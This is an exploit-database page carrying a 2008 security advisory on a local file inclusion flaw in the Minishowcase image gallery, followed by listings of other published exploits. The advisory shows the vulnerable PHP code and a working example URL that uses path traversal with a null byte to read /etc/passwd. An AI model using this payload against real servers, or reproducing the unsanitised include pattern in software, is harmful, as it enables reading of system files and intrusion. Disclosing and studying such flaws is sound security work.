Menu

Search for hundreds of thousands of exploits

"Minishowcase 09b136 - 'lang' Local File Inclusion"

Author

Exploit author

DSecRG

Platform

Exploit platform

php

Release date

Exploit published date

2008-07-29

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-034


Application:                    Minishowcase Image Gallery      
Versions Affected:              v09b136
Vendor URL:                     http://minishowcase.frwrd.net
Bug:                            Local File Include
Exploits:                       YES
Reported:                       14.07.2008
Second report:                  22.07.2008
Vendor response:                NONE
Solution:                       NONE
Date of Public Advisory:        29.07.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php

Vulnerable GET parameters "lang".

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

...
        $_dir_file = dirname(dirname(__FILE__));
        $_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
        
        if ($_dir_file != $_dir_path) {
                if (!isset($settings['minishowcase_url'])
                        || ($settings['minishowcase_url'] == "")) {
                        die ("<p style=\"margin:6px;padding:20px;text-align:left;font-size:18px;background:#f60;color:#FFF;\">ALERT: if you are including minishowcase with PHP into a website, please set the <code>\$minishowcase_url</code> variable in the <code>/config/settings.php</code> file</p>");
                }
        }
...
        if (isset($_GET["lang"])) $set_language = $_GET["lang"];
        $langfile = ROOT.'languages/'.$set_language.'.php';
        require_once($langfile);

#################################################

Example:

http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00


Solution
********

No response or any updates from vendor.


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)

# milw0rm.com [2008-07-29]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2009-08-18 "Adobe JRun 4 - 'logfile' (Authenticated) Directory Traversal" remote windows DSecRG
2009-06-08 "SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)" dos windows DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console /applications/applications.jsf URI Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console /sysnet/registration.jsf URI Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "Woodstock 4.2 404 - Error Page Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console '/resourceNode/jdbcResourceEdit.jsf?name' Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console /configuration/configuration.jsf URI Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console '/configuration/auditModuleEdit.jsf?name' Cross-Site Scripting" remote multiple DSecRG
2009-05-05 "GlassFish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI Cross-Site Scripting" remote multiple DSecRG
2009-04-16 "Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site Scripting Vulnerabilities" remote multiple DSecRG
2009-04-16 "Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting" remote multiple DSecRG
2009-04-16 "Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities" remote multiple DSecRG
2009-04-16 "Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function)" remote multiple DSecRG
2009-04-14 "ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection" webapps php DSecRG
2009-04-10 "Chance-i DiViS DVR System Web-Server - Directory Traversal" remote windows DSecRG
2009-04-10 "Chance-i DiViS-Web DVR System - ActiveX Control Heap Overflow (PoC)" dos windows DSecRG
2009-03-31 "PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite" remote windows DSecRG
2009-01-30 "Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite" remote windows DSecRG
2009-01-27 "Pixie CMS 1.0 - Multiple Local File Inclusions" webapps php DSecRG
2009-01-21 "AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting" remote hardware DSecRG
2008-12-08 "XOOPS 2.3.1 - Multiple Local File Inclusions" webapps php DSecRG
2008-11-18 "Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Local File Inclusion" webapps php DSecRG
2008-08-25 "EZContents CMS 2.0.3 - Multiple Local File Inclusions" webapps php DSecRG
2008-08-25 "Pluck CMS 4.5.2 - Multiple Local File Inclusions" webapps php DSecRG
2008-07-30 "MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting" webapps php DSecRG
2008-07-29 "Minishowcase 09b136 - 'lang' Local File Inclusion" webapps php DSecRG
2008-07-28 "Velocity Web-Server 1.0 - Directory Traversal" remote windows DSecRG
2008-07-28 "Dokeos E-Learning System 1.8.5 - Local File Inclusion" webapps php DSecRG
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.